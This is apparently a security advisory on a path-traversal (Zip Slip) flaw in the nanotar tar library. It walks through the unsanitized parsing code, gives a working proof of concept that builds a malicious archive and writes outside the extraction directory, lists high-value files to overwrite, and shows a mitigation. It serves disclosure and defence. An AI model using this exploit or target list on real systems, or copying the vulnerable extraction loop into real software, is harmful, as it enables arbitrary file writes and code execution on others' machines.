Feb 11, 2026
nanotar <= 0.2.0 trusts tar headers blindly. Attackers can include filenames with `../` sequences (Zip Slip) in archives. If you extract a malicious tarball using this library without manually validating paths, the attacker can overwrite any file your application has write access to (e.g., SSH keys, source code, config files).
A high-severity Path Traversal (Zip Slip) vulnerability exists in `nanotar` versions <= 0.2.0. The library, designed as a lightweight tar parser for the UnJS ecosystem, fails to sanitize file paths extracted from tar headers. This oversight allows attackers to craft malicious archives containing file names like `../../../etc/passwd`. When a developer uses `nanotar` to extract these archives—a primary use case for the library—the malicious paths facilitate arbitrary file writes outside the intended destination directory, potentially leading to Remote Code Execution (RCE) via configuration overwrite.
In the modern JavaScript ecosystem, everyone loves a micro-library. We want tools that are fast, zero-dependency, and do exactly one thing well. Enter nanotar, a part of the UnJS (Unified JavaScript Tools) suite. It promises a lightweight, portable way to parse and create tar archives. It's the kind of utility you pull in when you don't want the heavy lifting of node-tar or tar-stream. It's elegant, it's simple, and as it turns out, it's completely naive about the dangers of the outside world.
Here is the problem with minimalism: sometimes, code is minimal because it skipped the "boring" safety checks. nanotar is designed to take a buffer of binary data and turn it into a list of files. It reads the standard USTAR headers, extracts metadata, and hands you an object. The issue is that it hands you exactly what is in the header, verbatim. If the header says the file is named config.json, you get config.json. If the header says the file is named ../../../../../../root/.ssh/authorized_keys, nanotar shrugs and says, "Sure, here you go."
This isn't a new trick. We call this "Zip Slip," a vulnerability class that Snyk famously documented years ago. It's the zombie of the security world: just when you think we've learned to sanitize archive paths, a new library pops up that forgets history. In this case, nanotar effectively acts as an unwitting accomplice, handing the developer a loaded gun (the malicious path) and pointing it directly at their own foot (the filesystem write operation).
To understand why this is happening, we need to look at how Tar (Tape Archive) files work. They are essentially a concatenation of files, each preceded by a 512-byte header block. This header contains the file name, mode, uid, gid, size, and checksum. Crucially, the file name field is just a string. The POSIX standard allows for directory structures, but it assumes the extracting tool will act as a gatekeeper.
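To make the header layout concrete, here is a minimal sketch of reading the name and size fields from a 512-byte USTAR header block. The field offsets come from the POSIX ustar layout; the helpers `readField`, `readUstarName`, and `readUstarSize` are hypothetical illustrations, not nanotar's actual code:

```ts
// Minimal sketch of USTAR header parsing. Field offsets come from the
// POSIX ustar layout; these helpers are illustrative, not nanotar's code.
function readField(block: Uint8Array, offset: number, length: number): string {
  const bytes = block.subarray(offset, offset + length);
  const nul = bytes.indexOf(0); // fields are NUL-terminated
  return new TextDecoder().decode(nul === -1 ? bytes : bytes.subarray(0, nul));
}

// name: offset 0, 100 bytes — just a string, nothing enforces safety
function readUstarName(block: Uint8Array): string {
  return readField(block, 0, 100);
}

// size: offset 124, 12 bytes, octal ASCII
function readUstarSize(block: Uint8Array): number {
  return parseInt(readField(block, 124, 12).trim() || '0', 8);
}

// Demo: forge a header block in memory
const demoBlock = new Uint8Array(512);
demoBlock.set(new TextEncoder().encode('hello.txt'), 0);
demoBlock.set(new TextEncoder().encode('00000000021'), 124); // octal 21 = 17 bytes
```

Note that nothing in the format itself constrains the name field: `../../../etc/passwd` is just as valid a string as `config.json`.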
In nanotar, the parsing logic lives in src/parse.ts. The library iterates through the buffer in 512-byte chunks. When it finds a header, it reads the bytes at offset 0 to 100 as the filename. It also supports PAX extended headers (the mechanism used for filenames longer than 100 bytes). If a PAX header is present, it overrides the standard filename with the long path.
Here is the logic flaw: nanotar treats these strings as immutable truth. It performs zero sanitization. It does not check for absolute paths (starting with /). It does not check for relative path traversal (../). It does not normalize the path. It essentially deserializes untrusted input directly into a control variable that developers will almost certainly use to determine file system destinations. It is a textbook example of CWE-22 (Improper Limitation of a Pathname to a Restricted Directory).
Let's inspect the crime scene in src/parse.ts. This is the code running in nanotar <= 0.2.0. Observe how the name variable is populated and then immediately committed to the result object without inspection.
```ts
// src/parse.ts in nanotar <= 0.2.0

// 1. Read standard USTAR name (100 bytes)
let name = _readString(buffer, offset, 100);

// ... code to parse size, mode, etc ...

// 2. Handle PAX Extended Headers (long filenames).
// If the previous block was a PAX header, it might contain a 'path' property.
if (nextExtendedHeader) {
  const longName = nextExtendedHeader.path || nextExtendedHeader.linkpath;
  if (longName) {
    // VULNERABILITY: The longName is blindly assigned to name.
    // No check for "../", no check for "/", nothing.
    name = longName;
  }
}

// 3. Push to the array representing the tar contents
files.push({
  name,
  // ... other properties
  data: fileData,
});
```

There is no validation layer here. The `_readString` helper just slices the buffer and trims null bytes. The PAX handling just takes the string value. If an attacker constructs a tarball where the PAX header `path` value is `../index.js`, the files array returned to the user will contain an entry with `{ name: "../index.js" }`.
The library authors likely assumed that extraction (writing to disk) is the user's responsibility, and therefore validation is also the user's responsibility. However, in security engineering, secure-by-default is the gold standard. Returning raw, dangerous traversal sequences from a high-level parse function is a recipe for disaster because 99% of developers will simply loop through the results and fs.writeFile them.
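If the library wanted secure-by-default behavior, even a thin filter over the parsed entries would help. Here is a sketch of such a wrapper; the filter logic and the `rejectUnsafeEntries` helper are our own additions, and the entry shape (a `name` string plus optional `data`) is an assumption about the parser's output:

```ts
import path from 'path';

// Hypothetical secure-by-default filter for parsed tar entries.
// Drops absolute paths and anything that escapes upward after
// normalization (e.g. 'a/../../b' normalizes to '../b').
interface TarEntry {
  name: string;
  data?: Uint8Array;
}

function rejectUnsafeEntries(entries: TarEntry[]): TarEntry[] {
  return entries.filter((entry) => {
    const normalized = path.posix.normalize(entry.name);
    const unsafe =
      path.posix.isAbsolute(normalized) ||
      normalized === '..' ||
      normalized.startsWith('../');
    if (unsafe) {
      console.warn(`Dropping unsafe tar entry: ${entry.name}`);
    }
    return !unsafe;
  });
}
```

Normalizing before checking matters: a naive substring test would miss names like `a/../../b`, which only reveal their traversal after `path.normalize`.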
Exploiting this is trivially easy because nanotar actually provides a createTar function that helps us build the weapon. We don't even need a hex editor; we can use the library against itself to generate the malicious archive. The goal is to create a tar entry that, when extracted by a victim script, writes outside the target directory.
Below is a Proof of Concept. Imagine a web service that accepts a tarball of images, extracts it to uploads/, and processes the files. Our exploit will overwrite a critical system file instead.
```ts
import { createTar, parseTar } from 'nanotar';
import { writeFileSync, mkdirSync } from 'fs';
import { join, dirname } from 'path';

// --- THE ATTACKER ---
// Constructing the payload. Note the directory traversal.
const maliciousPayload = [
  {
    // We attempt to break out of the extract dir and hit /tmp.
    // In a real attack, this could be ../../../var/www/html/index.js
    name: '../../../tmp/pwned_by_nanotar.txt',
    data: new TextEncoder().encode('RCE via Zip Slip!'),
  },
];

// Create the binary tarball
const bomb = createTar(maliciousPayload);

// --- THE VICTIM ---
// A standard extraction loop found in many applications
const extractDir = '/app/uploads/extracted';
const parsedFiles = parseTar(bomb);

for (const file of parsedFiles) {
  // VULNERABLE SINK: blindly joining the path.
  // join('/app/uploads/extracted', '../../../tmp/pwned_by_nanotar.txt')
  // resolves to '/tmp/pwned_by_nanotar.txt' on Linux.
  const destination = join(extractDir, file.name);
  console.log(`Extracting to: ${destination}`); // Spoilers: it's not in extractDir
  mkdirSync(dirname(destination), { recursive: true });
  writeFileSync(destination, file.data);
}
```

When `path.join` encounters `..`, it resolves the path upwards. If the resulting path is passed to `fs.writeFileSync`, the file system permissions are the only thing stopping the overwrite. If the Node.js process runs as root (common in badly configured Docker containers), you own the box.
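The upward resolution can be seen in isolation; this tiny sketch is nothing nanotar-specific, just Node's `path.join` doing what it is documented to do:

```ts
import path from 'path';

// Demonstration of join() walking upward on "..": the crux of the sink.
// The path values are the ones from the PoC payload.
const resolved = path.join('/app/uploads/extracted', '../../../tmp/pwned_by_nanotar.txt');
// On POSIX systems this is '/tmp/pwned_by_nanotar.txt'
```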
Why is an arbitrary file write so dangerous? It is rarely just about defacing a website. File Write is often the precursor to Remote Code Execution (RCE). If I can write a file anywhere your application can, I can change how your application behaves.
Consider the targets:
- Overwrite `index.js` or a route handler with a web shell. The next time the server restarts or the route is hit, my code runs.
- Overwrite `.env`, `config.json`, or database connection strings to point to a server I control.
- Overwrite `/etc/shadow` or `/root/.ssh/authorized_keys`, or add a cron job in `/etc/cron.d/`.

The stealth of this attack is notable. The application doesn't crash. It happily processes the file, writes it where the attacker told it to, and continues. The administrator might not notice until the backdoor is triggered days later.
Since nanotar (at the time of version 0.2.0) does not sanitize input, the fix must be implemented in the application layer (the code using the library). You cannot rely on the library to protect you. The golden rule of file extraction is: Canonicalize, then Compare.
You must resolve the destination path to an absolute path and ensure it still starts with the expected destination directory. Here is the corrected logic:
```ts
import path from 'path';
import { writeFileSync, mkdirSync } from 'fs';

const destDir = path.resolve('/app/uploads');

for (const file of parsedFiles) {
  // 1. Resolve the full absolute path
  const finalPath = path.resolve(destDir, file.name);

  // 2. Security check: does the final path start with destDir?
  // We append path.sep so that /app/uploads-fake is not accepted.
  if (!finalPath.startsWith(destDir + path.sep)) {
    console.error(`Security Alert: Zip Slip attempt detected! Path: ${file.name}`);
    continue; // Skip this file or throw an error
  }

  // 3. Safe to write
  mkdirSync(path.dirname(finalPath), { recursive: true });
  writeFileSync(finalPath, file.data);
}
```

This simple check neutralizes the attack. Even if `file.name` is `../../etc/passwd`, `path.resolve` will turn it into `/etc/passwd`. The `startsWith` check will see that `/etc/passwd` does not start with `/app/uploads/`, and the operation will be blocked. This is the only reliable defense against Zip Slip.
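The check is also easy to unit-test if factored into a pure predicate. `isInsideDir` below is our own helper implementing the same Canonicalize, then Compare logic; the example paths assume a POSIX `path.sep`:

```ts
import path from 'path';

// Pure Canonicalize-then-Compare predicate: no filesystem access,
// so it can be unit-tested directly. Our own helper, not part of nanotar.
function isInsideDir(destDir: string, entryName: string): boolean {
  const base = path.resolve(destDir);
  const finalPath = path.resolve(base, entryName);
  // Appending path.sep rejects sibling dirs like '/app/uploads-fake'
  return finalPath.startsWith(base + path.sep);
}
```

Keeping the predicate free of `fs` calls means the traversal cases (`../`, absolute paths, look-alike sibling directories) can all be covered in fast unit tests before any archive ever touches disk.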
CVSS v3.1 Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| nanotar (unjs) | <= 0.2.0 | N/A (Manual Mitigation Required) |
| Attribute | Detail |
|---|---|
| Vulnerability ID | CVE-2025-69874 |
| CWE ID | CWE-22 (Path Traversal) |
| CVSS v3.1 | 7.5 (High) |
| Attack Vector | Network |
| Impact | Arbitrary File Write / RCE |
| Exploit Status | PoC Available |
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.